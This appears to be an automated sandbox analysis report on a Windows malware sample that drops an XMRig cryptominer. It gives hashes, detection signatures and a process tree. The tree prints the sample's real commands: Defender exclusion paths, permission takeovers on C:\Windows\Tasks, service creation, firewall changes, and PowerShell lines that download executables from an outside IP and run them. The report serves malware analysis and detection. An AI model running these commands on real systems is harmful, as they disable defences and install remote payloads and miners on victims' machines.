Analysis
-
max time kernel
151s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
13-05-2022 05:00
Static task
static1
Behavioral task
behavioral1
Sample
c671c024595fbae1bcb523930b41952a.exe
Resource
win7-20220414-en
General
-
Target
c671c024595fbae1bcb523930b41952a.exe
-
Size
6.7MB
-
MD5
c671c024595fbae1bcb523930b41952a
-
SHA1
af16bda06ebf490087aac1e444e25017e180c7d4
-
SHA256
39b66a47affa0edde59d74760fc17de28c0d3cbabe7469d382a721ea91b5c123
-
SHA512
fb1d9e0488eb247c54b86a0fbb7f1929d6ead0de3502d44e5db701aff3b3df0d7b312939e02bb89790006ea4337dc63b973ce5a2971e132a4188d003ddc95a3b
Malware Config
Extracted
http://45.81.224.130/any.exe
Extracted
http://45.81.224.130/curl.exe
Signatures
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\Tasks\ApplicationsFrameHost.exe xmrig C:\Windows\Tasks\ApplicationsFrameHost.exe xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 94 924 powershell.exe 157 3652 powershell.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
Processes:
migrate.exeWmiic.exeWmiic.exeWmiic.exeIntelConfigService.exeWrap.exeApplicationsFrameHost.exeSuperfetch.exeMSTask.exe~Ma4650.exeany.exewininit.execurl.exepid process 3312 migrate.exe 2180 Wmiic.exe 4236 Wmiic.exe 3464 Wmiic.exe 3568 IntelConfigService.exe 1416 Wrap.exe 3648 ApplicationsFrameHost.exe 1100 Superfetch.exe 4480 MSTask.exe 5092 ~Ma4650.exe 2240 any.exe 460 wininit.exe 2940 curl.exe -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 18 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4516 icacls.exe 2008 icacls.exe 384 takeown.exe 3796 icacls.exe 4480 icacls.exe 4196 icacls.exe 4972 icacls.exe 908 icacls.exe 4892 icacls.exe 4712 icacls.exe 3616 icacls.exe 3880 icacls.exe 2068 icacls.exe 3360 icacls.exe 2476 icacls.exe 5048 icacls.exe 1480 icacls.exe 1944 icacls.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
c671c024595fbae1bcb523930b41952a.exemigrate.exeany.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation c671c024595fbae1bcb523930b41952a.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation migrate.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation any.exe -
Loads dropped DLL 3 IoCs
Processes:
~Ma4650.exepid process 5092 ~Ma4650.exe 5092 ~Ma4650.exe 5092 ~Ma4650.exe -
Modifies file permissions 1 TTPs 18 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 4712 icacls.exe 4196 icacls.exe 4480 icacls.exe 2476 icacls.exe 5048 icacls.exe 3796 icacls.exe 3880 icacls.exe 908 icacls.exe 384 takeown.exe 1944 icacls.exe 4516 icacls.exe 2068 icacls.exe 1480 icacls.exe 4892 icacls.exe 3616 icacls.exe 4972 icacls.exe 2008 icacls.exe 3360 icacls.exe -
AutoIT Executable 4 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule C:\Windows\Tasks\IntelConfigService.exe autoit_exe C:\windows\tasks\IntelConfigService.exe autoit_exe C:\Windows\Tasks\Superfetch.exe autoit_exe C:\Windows\Tasks\Superfetch.exe autoit_exe -
Drops file in Windows directory 31 IoCs
Processes:
migrate.exeany.exepowershell.exeIntelConfigService.exeApplicationsFrameHost.exepowershell.execmd.exedescription ioc process File opened for modification C:\Windows\Tasks\MSTask.exe migrate.exe File created C:\Windows\Tasks\run.bat migrate.exe File created C:\Windows\Tasks\Wmiic.exe migrate.exe File created C:\Windows\Tasks\ApplicationsFrameHost.exe migrate.exe File opened for modification C:\Windows\Tasks\ApplicationsFrameHost.exe migrate.exe File created C:\Windows\Migration\system.conf any.exe File created \??\c:\windows\migration\any.exe powershell.exe File opened for modification C:\Windows\Tasks\config.json migrate.exe File opened for modification C:\Windows\Tasks\run.bat migrate.exe File opened for modification C:\Windows\Migration\system.conf any.exe File created C:\Windows\Tasks\Superfetch.exe migrate.exe File created C:\Windows\Tasks\Wrap.exe migrate.exe File opened for modification C:\Windows\Tasks IntelConfigService.exe File created C:\Windows\Tasks\config.json migrate.exe File opened for modification C:\Windows\Tasks\IntelConfigService.exe migrate.exe File created C:\Windows\Tasks\__tmp_rar_sfx_access_check_240568375 migrate.exe File created C:\Windows\Tasks\MSTask.exe migrate.exe File created C:\Windows\Migration\__tmp_rar_sfx_access_check_240580328 any.exe File opened for modification C:\Windows\Migration\wininit.exe any.exe File created C:\Windows\Migration\any.bat any.exe File opened for modification C:\Windows\Migration\any.bat any.exe File opened for modification C:\Windows\Tasks\Wrap.exe migrate.exe File opened for modification C:\Windows\Tasks\config.json ApplicationsFrameHost.exe File created C:\Windows\Migration\wininit.exe any.exe File created \??\c:\windows\curl.exe powershell.exe File created C:\Windows\Migration\.tmp cmd.exe File created C:\Windows\Tasks\IntelConfigService.exe migrate.exe File opened for modification C:\Windows\Tasks\Superfetch.exe migrate.exe File created C:\Windows\Tasks\WinRing0x64.sys migrate.exe File opened for modification C:\Windows\Tasks\WinRing0x64.sys migrate.exe File opened for modification C:\Windows\Tasks\Wmiic.exe migrate.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 9 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4952 timeout.exe 808 timeout.exe 4716 timeout.exe 3828 timeout.exe 3100 timeout.exe 4696 timeout.exe 1672 timeout.exe 1616 timeout.exe 4444 timeout.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
Processes:
tasklist.exetasklist.exetasklist.exepid process 3944 tasklist.exe 3100 tasklist.exe 204 tasklist.exe -
Processes:
~Ma4650.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe -
Modifies data under HKEY_USERS 22 IoCs
Processes:
MSTask.exe~Ma4650.exewininit.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MSTask.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MSTask.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MSTask.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\MacroWebExplorer.exe = "11001" ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections wininit.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MSTask.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\MAIN ~Ma4650.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MSTask.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exeIntelConfigService.exepowershell.exepid process 4048 powershell.exe 4048 powershell.exe 1092 powershell.exe 1092 powershell.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 924 powershell.exe 924 powershell.exe 924 powershell.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
~Ma4650.exepid process 5092 ~Ma4650.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exeApplicationsFrameHost.exepowershell.exetasklist.exepowershell.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4048 powershell.exe Token: SeDebugPrivilege 1092 powershell.exe Token: SeDebugPrivilege 3944 tasklist.exe Token: SeLockMemoryPrivilege 3648 ApplicationsFrameHost.exe Token: SeDebugPrivilege 924 powershell.exe Token: SeDebugPrivilege 3100 tasklist.exe Token: SeDebugPrivilege 3652 powershell.exe Token: SeIncreaseQuotaPrivilege 3516 WMIC.exe Token: SeSecurityPrivilege 3516 WMIC.exe Token: SeTakeOwnershipPrivilege 3516 WMIC.exe Token: SeLoadDriverPrivilege 3516 WMIC.exe Token: SeSystemProfilePrivilege 3516 WMIC.exe Token: SeSystemtimePrivilege 3516 WMIC.exe Token: SeProfSingleProcessPrivilege 3516 WMIC.exe Token: SeIncBasePriorityPrivilege 3516 WMIC.exe Token: SeCreatePagefilePrivilege 3516 WMIC.exe Token: SeBackupPrivilege 3516 WMIC.exe Token: SeRestorePrivilege 3516 WMIC.exe Token: SeShutdownPrivilege 3516 WMIC.exe Token: SeDebugPrivilege 3516 WMIC.exe Token: SeSystemEnvironmentPrivilege 3516 WMIC.exe Token: SeRemoteShutdownPrivilege 3516 WMIC.exe Token: SeUndockPrivilege 3516 WMIC.exe Token: SeManageVolumePrivilege 3516 WMIC.exe Token: 33 3516 WMIC.exe Token: 34 3516 WMIC.exe Token: 35 3516 WMIC.exe Token: 36 3516 WMIC.exe Token: SeIncreaseQuotaPrivilege 3516 WMIC.exe Token: SeSecurityPrivilege 3516 WMIC.exe Token: SeTakeOwnershipPrivilege 3516 WMIC.exe Token: SeLoadDriverPrivilege 3516 WMIC.exe Token: SeSystemProfilePrivilege 3516 WMIC.exe Token: SeSystemtimePrivilege 3516 WMIC.exe Token: SeProfSingleProcessPrivilege 3516 WMIC.exe Token: SeIncBasePriorityPrivilege 3516 WMIC.exe Token: SeCreatePagefilePrivilege 3516 WMIC.exe Token: SeBackupPrivilege 3516 WMIC.exe Token: SeRestorePrivilege 3516 WMIC.exe Token: SeShutdownPrivilege 3516 WMIC.exe Token: SeDebugPrivilege 3516 WMIC.exe Token: SeSystemEnvironmentPrivilege 3516 WMIC.exe Token: SeRemoteShutdownPrivilege 3516 WMIC.exe Token: SeUndockPrivilege 3516 WMIC.exe Token: SeManageVolumePrivilege 3516 WMIC.exe Token: 33 3516 WMIC.exe Token: 34 3516 WMIC.exe Token: 35 3516 WMIC.exe Token: 36 3516 WMIC.exe Token: SeIncreaseQuotaPrivilege 2332 WMIC.exe Token: SeSecurityPrivilege 2332 WMIC.exe Token: SeTakeOwnershipPrivilege 2332 WMIC.exe Token: SeLoadDriverPrivilege 2332 WMIC.exe Token: SeSystemProfilePrivilege 2332 WMIC.exe Token: SeSystemtimePrivilege 2332 WMIC.exe Token: SeProfSingleProcessPrivilege 2332 WMIC.exe Token: SeIncBasePriorityPrivilege 2332 WMIC.exe Token: SeCreatePagefilePrivilege 2332 WMIC.exe Token: SeBackupPrivilege 2332 WMIC.exe Token: SeRestorePrivilege 2332 WMIC.exe Token: SeShutdownPrivilege 2332 WMIC.exe Token: SeDebugPrivilege 2332 WMIC.exe Token: SeSystemEnvironmentPrivilege 2332 WMIC.exe Token: SeRemoteShutdownPrivilege 2332 WMIC.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
IntelConfigService.exeApplicationsFrameHost.exeSuperfetch.exepid process 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3568 IntelConfigService.exe 3648 ApplicationsFrameHost.exe 1100 Superfetch.exe 1100 Superfetch.exe 1100 Superfetch.exe 1100 Superfetch.exe 1100 Superfetch.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
~Ma4650.exepid process 5092 ~Ma4650.exe 5092 ~Ma4650.exe 5092 ~Ma4650.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
c671c024595fbae1bcb523930b41952a.execmd.execmd.exemigrate.exedescription pid process target process PID 448 wrote to memory of 4048 448 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 448 wrote to memory of 4048 448 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 448 wrote to memory of 4048 448 c671c024595fbae1bcb523930b41952a.exe powershell.exe PID 448 wrote to memory of 4696 448 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 448 wrote to memory of 4696 448 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 448 wrote to memory of 4696 448 c671c024595fbae1bcb523930b41952a.exe cmd.exe PID 4696 wrote to memory of 4992 4696 cmd.exe cmd.exe PID 4696 wrote to memory of 4992 4696 cmd.exe cmd.exe PID 4696 wrote to memory of 4992 4696 cmd.exe cmd.exe PID 4992 wrote to memory of 2296 4992 cmd.exe chcp.com PID 4992 wrote to memory of 2296 4992 cmd.exe chcp.com PID 4992 wrote to memory of 2296 4992 cmd.exe chcp.com PID 4992 wrote to memory of 1092 4992 cmd.exe powershell.exe PID 4992 wrote to memory of 1092 4992 cmd.exe powershell.exe PID 4992 wrote to memory of 1092 4992 cmd.exe powershell.exe PID 4992 wrote to memory of 3944 4992 cmd.exe tasklist.exe PID 4992 wrote to memory of 3944 4992 cmd.exe tasklist.exe PID 4992 wrote to memory of 3944 4992 cmd.exe tasklist.exe PID 4992 wrote to memory of 4236 4992 cmd.exe find.exe PID 4992 wrote to memory of 4236 4992 cmd.exe find.exe PID 4992 wrote to memory of 4236 4992 cmd.exe find.exe PID 4992 wrote to memory of 384 4992 cmd.exe takeown.exe PID 4992 wrote to memory of 384 4992 cmd.exe takeown.exe PID 4992 wrote to memory of 384 4992 cmd.exe takeown.exe PID 4992 wrote to memory of 4952 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 4952 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 4952 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 2068 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 2068 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 2068 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 5048 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 5048 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 5048 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3796 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3796 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3796 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3360 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3360 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 3360 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 2476 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 2476 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 2476 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 1480 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 1480 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 1480 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 4892 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 4892 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 4892 4992 cmd.exe icacls.exe PID 4992 wrote to memory of 808 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 808 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 808 4992 cmd.exe timeout.exe PID 4992 wrote to memory of 3312 4992 cmd.exe migrate.exe PID 4992 wrote to memory of 3312 4992 cmd.exe migrate.exe PID 4992 wrote to memory of 3312 4992 cmd.exe migrate.exe PID 3312 wrote to memory of 4712 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4712 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4712 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4196 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4196 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4196 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 3616 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 3616 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 3616 3312 migrate.exe icacls.exe PID 3312 wrote to memory of 4480 3312 migrate.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"C:\Users\Admin\AppData\Local\Temp\c671c024595fbae1bcb523930b41952a.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\programdata\ru.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650014⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f c:\windows\tasks4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "Admin:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
\??\c:\programdata\migrate.exec:\programdata\migrate.exe -p44324⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Users:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "Admin:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "%domain%Admin:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\System32\icacls.exe" "c:\windows\tasks\" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\tasks\run.bat" "5⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 1 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\windows\tasks\Wmiic.exe"C:\windows\tasks\wmiic" start WMService6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 2 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet start WMService6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start WMService7⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="block vilnerabliti" dir=in protocol=TCP localport=88 action=block6⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on6⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/any.exe','c:\windows\migration\any.exe')"4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK4⤵
- Delays execution with timeout.exe
-
\??\c:\windows\migration\any.exec:\windows\migration\any.exe4⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\migration\any.bat" "5⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\sc.exeSc create TaskSc binPath="C:\programdata\wininit.exe --service" DisplayName="Task Schedubler" type=own start=auto6⤵
-
C:\Windows\SysWOW64\sc.exeSc create TaskSc binPath= "C:\programdata\wininit.exe --service" DisplayName= "Task Schedubler" type= own start= auto6⤵
-
C:\Windows\SysWOW64\net.exenet start TaskSc6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TaskSc7⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 15 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\net.exenet stop TaskSc6⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop TaskSc7⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
C:\Windows\SysWOW64\mshta.exemshta "vbscript:CreateObject("Scripting.FileSystemObject").GetStandardStream(1).Write(Split(Split(CreateObject("Scripting.FileSystemObject").OpenTextFile(".tmp").ReadAll(),"Client-ID:")(1),".")(0))&Close()"6⤵
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "IMAGENAME eq Superfetch.exe"4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /N "Superfetch.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "(new-object System.Net.WebClient).DownloadFile('http://45.81.224.130/curl.exe','c:\windows\curl.exe')"4⤵
- Blocklisted process makes network request
